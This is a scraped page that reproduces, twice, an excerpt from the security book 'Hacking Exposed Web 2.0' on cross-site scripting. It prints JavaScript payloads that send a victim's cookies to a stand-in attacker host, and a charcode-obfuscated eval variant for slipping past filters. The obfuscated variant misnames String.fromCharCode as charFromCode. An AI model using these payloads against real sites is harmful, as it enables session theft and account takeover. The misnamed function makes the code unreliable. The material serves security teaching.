PARTS:
Part 2
Part 3
Part 4
Part 5
Part 6
Part 7
Part 8
Part 9
Part 10
Part 11
Part 12
Part 13
Part 14
Part 15
Part 16
Part 17
Part 18
Part 19
Part 20
Part 21
WHAT'S HOT
Rich Cannings, Himanshu Dwivedi, Zane Lackey, and Alex Stamos
"Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions"
So
the attacker will have access to victim??™s account only for that limited time. Cookies can
be stolen with the following code:
var x=new Image();x.src='http://attackerssite.com/eatMoreCookies?c='
+document.cookie;
or
document.write("![](http://attackerssite.com/eatMoreCookies"+<br>"?c="+document.cookie+")
");
If certain characters are disallowed, convert these strings to their ASCII decimal value
and use JavaScript??™s String.charFromCode() function. The following JavaScript is
equivalent to the preceding JavaScript:
eval(String.charFromCode(118,97,114,32,120,61,110,101,119,32,73,109,
97,103,101,40,41,59,120,46,115,114,99,61,39,104,116,116,112,58,47,47,
97,116,116,97,99,107,101,114,115,115,105,116,101,46,99,111,109,47,
101,97,116,77,111,114,101,67,111,111,107,105,101,115,63,99,61,39,43,
100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));
Chapter 2: Cross-Site Scripting 45
Phishing Attacks
An attacker can use an XSS for social engineering by mimicking the web application to
the user. Upon a successful XSS, the attacker has complete control as to how the web
application looks. This can be used for web defacement, where an attacker puts up a silly
picture, for example.
Pages:
99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123
the attacker will have access to victim??™s account only for that limited time. Cookies can
be stolen with the following code:
var x=new Image();x.src='http://attackerssite.com/eatMoreCookies?c='
+document.cookie;
or
document.write("
If certain characters are disallowed, convert these strings to their ASCII decimal value
and use JavaScript??™s String.charFromCode() function. The following JavaScript is
equivalent to the preceding JavaScript:
eval(String.charFromCode(118,97,114,32,120,61,110,101,119,32,73,109,
97,103,101,40,41,59,120,46,115,114,99,61,39,104,116,116,112,58,47,47,
97,116,116,97,99,107,101,114,115,115,105,116,101,46,99,111,109,47,
101,97,116,77,111,114,101,67,111,111,107,105,101,115,63,99,61,39,43,
100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));
Chapter 2: Cross-Site Scripting 45
Phishing Attacks
An attacker can use an XSS for social engineering by mimicking the web application to
the user. Upon a successful XSS, the attacker has complete control as to how the web
application looks. This can be used for web defacement, where an attacker puts up a silly
picture, for example.
Pages:
99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123